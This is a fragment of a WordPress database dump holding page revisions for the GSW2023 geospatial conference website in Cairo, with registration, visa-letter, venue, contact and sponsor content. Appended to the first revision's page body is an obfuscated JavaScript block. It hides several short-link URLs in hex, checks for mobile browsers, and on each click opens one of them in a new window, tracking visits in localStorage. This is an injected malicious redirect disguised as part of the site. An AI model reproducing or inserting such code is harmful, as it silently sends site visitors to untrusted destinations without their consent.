tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 20:59:04','2023-06-13 20:59:04','',3066,'https://gsw2023.com/?p=4682',0,'revision','',0),
(4683,1,'2023-06-13 21:31:33','2023-06-13 21:31:33','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text 